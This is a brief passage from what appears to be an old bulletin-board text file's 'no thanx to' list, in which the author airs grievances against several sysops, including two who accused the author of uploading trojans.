   All NFSA sysops, except for a few.
   Tom and Bob, after I thought they were ok guys (and I still do), for saying that I u/l trojans when I didn't. Why, guys?
   Tally Net sysops, for killing this text.
   That remote off Legal3.
   All sysops that killed this text.

Note: When I say 'no thanx to', it's not a 'hit list', but it made me kind of mad.